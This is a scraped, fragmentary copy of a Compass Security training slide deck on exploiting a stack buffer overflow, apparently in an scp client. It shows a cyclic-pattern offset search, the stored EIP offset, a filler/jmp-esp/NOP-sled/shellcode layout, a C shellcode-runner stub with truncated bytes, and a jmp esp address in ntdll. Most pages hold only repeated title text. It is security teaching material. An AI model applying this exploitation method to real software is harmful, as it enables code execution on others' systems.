36

PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

  • Upload
    others

  • View
    0

  • Download
    0

Embed Size (px)

Citation preview

Page 1: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 3: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

$ scp <remotefile> <localfile>

$ scp <Ax500> whatever.txt

Page 4: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 5: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 6: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 7: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab

Trigger:

Page 8: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 9: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 10: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab

Trigger:

Analyze:

Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa

Stored EIP @ location 492

Page 11: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab

Trigger:

Verification

Analyze:

AAAAAAAAAA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC BBBB

Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa

payload[492]

sEIP

Page 12: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 13: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab

Trigger:

Verification

Analyze:

AAAAAAAAAA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC BBBB

Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa

sEIP

Page 14: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 15: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab

Trigger:

Verification

Analyze:

AAAAAAAAAA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC BBBB

Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa

ESP

sEIP

Page 16: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 17: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 18: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

msfpayload:

msfencode:

Page 19: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

#include <stdio.h> char code[] = "\xbb\xa0\xc9\xa5 ... "; int main(int argc, char **argv) { char x[500]; int (*func)(); func = (int (*)()) code; (int)(*func)(); }

GCC@WIN:

www.mingw.org

Page 20: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 21: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab

Trigger:

Verification:

Analyze:

AAAAAAAAAA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC BBBB

Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa

AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP

Exploit: ESP

sEIP

Page 22: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP

Code

Stack

… jmp %esp …

[Filename] &caller [Stuff…] [Stuff…] [Stuff…] [Stuff…]

EIP (copy filename)

Stored EIP (caller)

Page 23: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP

… jmp %esp …

AAAAAAAAAAA &JMP <nopnopnop> <nopnopnop> <shellcode> <shellcode>

ESP

EIP (copy filename)

Stored EIP (caller)

Page 24: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP

… jmp %esp …

AAAAAAAAAAA &JMP <nopnopnop> <nopnopnop> <shellcode> <shellcode>

ESP

EIP

Page 25: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP

… jmp %esp …

AAAAAAAAAAA &JMP <nopnopnop> <nopnopnop> <shellcode> <shellcode>

ESP, EIP

Page 26: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP

… jmp %esp …

AAAAAAAAAAA &JMP <nopnopnop> <nopnopnop> <shellcode> <shellcode>

ESP

EIP

Page 27: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

Stored EIP

Shellcode

Filler

Page 28: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

Stored EIP

Shellcode

Filler

Page 29: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A

&(jmp %esp @ ntdll): 0x7c91fcd8

Page 30: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 31: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 32: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 33: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 34: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 35: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A
Page 36: PowerPoint Presentation - Compass Security...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab Trigger: Verification: Analyze: AAAAAAAAAA BBBB CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Aa0Aa1Aa2A